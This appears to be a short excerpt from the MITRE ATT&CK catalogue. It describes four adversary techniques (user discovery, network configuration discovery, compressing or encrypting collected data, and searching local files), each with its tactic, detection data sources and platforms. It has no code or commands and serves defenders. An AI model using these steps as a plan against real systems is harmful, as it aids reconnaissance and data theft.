Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre